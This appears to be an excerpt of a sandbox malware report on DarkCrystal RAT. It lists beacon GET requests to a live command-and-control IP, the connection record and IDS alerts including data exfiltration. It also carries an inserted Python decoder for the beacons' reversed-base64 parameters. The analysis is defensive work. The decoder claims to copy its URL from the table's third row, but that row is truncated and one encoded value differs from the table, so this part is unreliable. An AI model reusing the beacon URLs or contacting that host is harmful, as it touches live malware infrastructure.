2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&91070d43273a2d2f20b3845ebe197c05=d1nI4ETZ0YGOjFWZ4ETM3QTYmRTO2cDM4UGNiVDNwUjZ3UjNzUTYhFTY0IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W&4b3ed01d1b7d17d2374397bcf88db6a2=… | NL | text | 104 b | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&91070d43273a2d2f20b3845ebe197c05=d1nI4ETZ0YGOjFWZ4ETM3QTYmRTO2cDM4UGNiVDNwUjZ3UjNzUTYhFTY0IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W&4b3ed01d1b7d17d2374397bcf88db6a2=… | NL | text | 104 b | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&cdcb8a5f0961cc7a07b5ac3d675f9811=… | NL | text | 104 b | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&4b3ed01d1b7d17d2374397bcf88db6a2=0VfiIiOicDMmNWM0YzMhJmZ3QDM1EGOwgDMwAjMzQGM3YmN0EGOiwiI5UGZ3EjY1MmMmljNzEGZ4IzY0QjZiN2NmRDM5UGOkBDOkFzY0kDNiJiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W | NL | text | 104 b | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&91070d43273a2d2f20b3845ebe197c05=d1nI4ETZ0YGOjFWZ4ETM3QTYmRTO2cDM4UGNiVDNwUjZ3UjNzUTYhFTY0IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W&4b3ed01d1b7d17d2374397bcf88db6a2=… | NL | text | 104 b | malicious |
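The query strings of these beacons are what the first two IDS signatures further down key on. The added example below (not part of the report and not DCRat's code) takes the third GET in the table and shows that every parameter whose name is 32 hexadecimal characters carries a value that is base64 written backwards with the padding removed, while the parameters with random-looking names do not decode and act as filler; one of the decoded values is itself a JSON list keyed by further 32-hex-character names. The URL is copied from the table. What the decoded fields stand for (bot identifier, host fingerprint and so on) is not stated on this page and is not claimed here.

```python
"""Decode the query string of a DCRat beacon URL from the report's HTTP table.

Added example (not the ANY.RUN report's or DCRat's code). The URL is copied from
the report; the meaning of the decoded fields is not established here.
"""
import base64
import binascii
import json
import re
from urllib.parse import parse_qsl, urlsplit

# Copied from the report (third GET row).
BEACON_URL = (
    "http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/"
    "1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php"
    "?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f"
    "&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN"
    "&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY"
    "&4b3ed01d1b7d17d2374397bcf88db6a2=0VfiIiOicDMmNWM0YzMhJmZ3QDM1EGOwgDMwAjMzQGM3YmN0EGOiwiImJGMkljMzgzMyEzY2gDNzYWMyIzN3QzM4gDZ4EzMkhzMmZWO5YjM1IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W"
)

_HEX32 = re.compile(r"[0-9a-f]{32}")


def decode_reversed_b64(value):
    """Reverse the string, restore base64 padding and decode.
    Returns the decoded text, or None when the value is not encoded this way."""
    s = value[::-1]
    if len(s) % 4 == 1:            # no base64 string has this length
        return None
    s += "=" * (-len(s) % 4)
    try:
        text = base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def encode_reversed_b64(text):
    """The inverse transformation, to show the encoding round-trips."""
    return base64.b64encode(text.encode("utf-8")).decode("ascii").rstrip("=")[::-1]


def parse_beacon(url):
    """Split a beacon URL into host, path and per-parameter decoding results."""
    parts = urlsplit(url)
    fields = []
    for key, raw in parse_qsl(parts.query, keep_blank_values=True):
        decoded = decode_reversed_b64(raw)
        nested = None
        if decoded and decoded[0] in "[{":      # a decoded value may itself be JSON
            try:
                nested = json.loads(decoded)
            except json.JSONDecodeError:
                nested = None
        fields.append({
            "key": key,
            "kind": "hashed-name" if _HEX32.fullmatch(key) else "filler",
            "raw": raw,
            "decoded": decoded,
            "json": nested,
        })
    return {"host": parts.hostname, "path": parts.path, "fields": fields}


if __name__ == "__main__":
    beacon = parse_beacon(BEACON_URL)
    print(f"{beacon['host']} {beacon['path']}")
    for f in beacon["fields"]:
        shown = json.dumps(f["json"]) if f["json"] is not None else f["decoded"]
        print(f"  [{f['kind']:11}] {f['key']} -> {shown}")
```

The decoder refuses anything that is not well-formed base64, so the two filler parameters come back as None rather than as garbage, which is what makes the 32-hex-character names stand out as the real fields. The same transformation, run in reverse by encode_reversed_b64, reproduces the on-the-wire value from the decoded text.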
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2948 | SearchProtocolHost.exe | 45.156.84.108:80 | — | combahton GmbH | NL | malicious |
PID | Process | Class | Message |
---|---|---|---|
2948 | SearchProtocolHost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
2948 | SearchProtocolHost.exe | A Network Trojan was detected | ET MALWARE DarkCrystal Rat Stealer Data Exfiltration Activity |
2948 | SearchProtocolHost.exe | A Network Trojan was detected | ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt) |

All three signatures fire on PID 2948 (SearchProtocolHost.exe, which is absent from the process excerpt above). The HTTP table lists only GET beacons; the POST carrying Information.txt that triggered the third signature is not part of that excerpt, so the exfiltration is evidenced here by the IDS alert rather than by a captured request.